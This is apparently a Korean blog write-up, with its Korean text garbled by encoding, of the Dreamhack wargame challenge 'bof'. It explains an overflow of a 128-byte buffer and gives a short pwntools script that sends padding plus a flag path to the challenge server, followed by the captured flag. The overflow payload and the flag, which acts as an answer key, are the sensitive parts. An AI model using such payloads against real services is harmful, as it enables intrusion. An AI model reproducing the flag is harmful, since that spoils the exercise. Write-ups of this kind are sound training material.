๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
hacking/pwnable

[Dream hack] bof

by ilp 2024. 10. 6.
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/1111

 

bof

Description Buffer overflow is one of the basics of pwnable ๐Ÿฑ The path of the flag file is /home/bof/flag.

dreamhack.io


 


๋‹ต

์ฒ˜์Œ ํŒŒ์ผ์„ ๋ณด๋ฉด Dockerfile์ด ์žˆ๊ณ  deploy ํด๋”๊ฐ€ ์žˆ๋Š”๋ฐ

์ด deploy ์•ˆ์—๋Š” bof cat flag ์ด๋ ‡๊ฒŒ ์ƒˆ๊ฒŒ์˜ ํŒŒ์ผ์ด ์žˆ๋‹ค.

๊ทธ์ค‘์—์„œ bof๊ฐ€ ์ฝ”๋“œ๋ผ๊ณ  ์ƒ๊ฐํ–ˆ๊ณ  IDA๋กœ ์—ด์–ด๋ณด์•˜๋‹ค.

์ด๊ฒŒ ์ฝ”๋“œ์ธ๊ฑฐ ๊ฐ™์€๋ฐ ๊ทธ๋Ÿผ v4์— ์ž…๋ ฅ์„ ๋ฐ›๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.

๊ทธ๋Ÿฌ๋‚˜ v4์˜ ํฌ๊ธฐ๋Š” 128์ธ๋ฐ ์ž…๋ ฅ์„ 144๋งŒํผ ๋ฐ›์„ ์ˆ˜ ์žˆ๋‹ค. ์—ฌ๊ธฐ์„œ bof๋ฅผ ์“ธ ์ˆ˜ ์žˆ๋‹ค.

 

128๊ฐœ์˜ ๋”๋ฏธ ๊ฐ’์„ ์ž…๋ ฅํ•ด์ฃผ๊ณ , flag๊ฐ€ ์žˆ๋‹ค๊ณ ํ•œ /home/bof/flag ์„ ์ž…๋ ฅํ•ด์ฃผ๋ฉด ๋œ๋‹ค.

๊ทธ๋Ÿผ ์ถœ๋ ฅ์—์„œ /home/bof/flag์˜ ๊ฐ’์„ ์ถœ๋ ฅํ•˜๊ฒŒ ๋œ๋‹ค.

 

์ต์Šคํ”Œ๋กœ์ž‡ ์ฝ”๋“œ๋ฅผ ์ง ๋‹ค.

์ฒ˜์Œ์—๋Š” ์„œ๋ฒ„ ์—ฐ๊ฒฐ์„ ํ•ด์ฃผ๊ณ 

ํŽ˜์ด๋กœ๋“œ ์ž‘์„ฑํ•˜๊ณ  ์„œ๋ฒ„์— ๋ณด๋‚ด์ค€๋‹ค.

'c'๋ฅผ 128๊ฐœ ๊ทธ๋ฆฌ๊ณ  flag๊ฐ€ ์žˆ๋Š” ์ฃผ์†Œ๋ฅผ ๋ณด๋‚ด์ค€๋‹ค.

 

์ „์ฒด ์ฝ”๋“œ

from pwn import *
p=remote("host3.dreamhack.games",14960)

chuu=b'c'*128+b'/home/bof/flag'
p.sendlineafter(b'meow? ',chuu)


p.interactive()
๋”๋ณด๊ธฐ
๋”๋ณด๊ธฐ

DH{5cd1f793ae6a081e4bfd28f6d570d83355148245fbe7c1f69b12771202b80a13}


๋

๋ฐ˜์‘ํ˜•

'hacking > pwnable' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Dream hack] out_of_bound  (0) 2024.10.07
[Dream hack] welcome  (0) 2024.10.06
[Dream hack] Quiz: Out of Bounds-1  (0) 2024.09.20
[Dream hack] Memory Corruption: Out of Bounds  (6) 2024.09.19
[Dream hack] Return Address Overwrite  (0) 2024.09.18